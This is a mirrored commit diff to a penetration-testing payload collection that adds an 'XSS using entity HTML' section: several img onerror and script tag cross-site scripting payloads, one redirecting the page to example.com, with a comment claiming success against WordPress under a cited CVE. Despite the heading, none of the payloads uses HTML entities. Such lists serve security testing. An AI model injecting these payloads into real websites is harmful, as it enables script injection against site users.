mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2026-05-08 04:28:39 +02:00
Merge 4604f7bcfb into a79b1f5692
This commit is contained in:
commit
5100f1ef22
1 changed files with 10 additions and 0 deletions
|
|
@ -214,6 +214,16 @@ Most tools are also suitable for blind XSS attacks:
|
|||
<div onpointerout="alert(45)">MOVE HERE</div>
|
||||
<div onpointerup="alert(45)">MOVE HERE</div>
|
||||
```
|
||||
### XSS using entity HTML
|
||||
|
||||
```javascript
|
||||
// Works very good at Wordpress (CVE-2025-14588)
|
||||
|
||||
<img src=x onerror=alert(1)>
|
||||
<img src=x onerror=window.location.href="https://example.com">
|
||||
<img src=1 onerror="alert(1)">
|
||||
<script>alert(1)</script>
|
||||
```
|
||||
|
||||
### XSS using HTML5 tags
|
||||
|
||||
|
|
|
|||
Loading…
Reference in a new issue